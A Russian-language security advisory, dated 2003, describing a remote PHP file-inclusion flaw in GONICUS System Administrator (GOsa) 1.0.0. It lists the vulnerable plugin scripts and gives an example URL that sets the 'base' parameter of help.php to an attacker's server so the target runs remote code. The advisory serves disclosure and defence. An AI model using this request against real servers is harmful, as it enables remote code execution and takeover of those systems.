Security Lab

Выполнение произвольного PHP кода в GONICUS

Дата публикации:28.02.2003
Дата изменения:17.10.2006
Всего просмотров:1065
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в GONICUS System Administrator (GOsa). Удаленный пользователь может внедрить и выполнить произвольный PHP код на системе, включая команды операционной системы.

Несколько сценариев в программе позволяют удаленному пользователю изменять переменные, чтобы выполнить произвольный код. Удаленный пользователь может установить переменную 'plugin' в следующих файлах, указывающую на удаленно расположенный PHP файл, который будет выполнен на целевом сервере:

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/ 4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php
Подобная уязвимость существует в 'base' переменной в 'include/help.php' сценарии.

Пример:

http://target.server/include/help.php?base=http://attackers.server/
Уязвимость обнаружена в GONICUS 1.0.0
Ссылки: GOnicus System Administrator php injection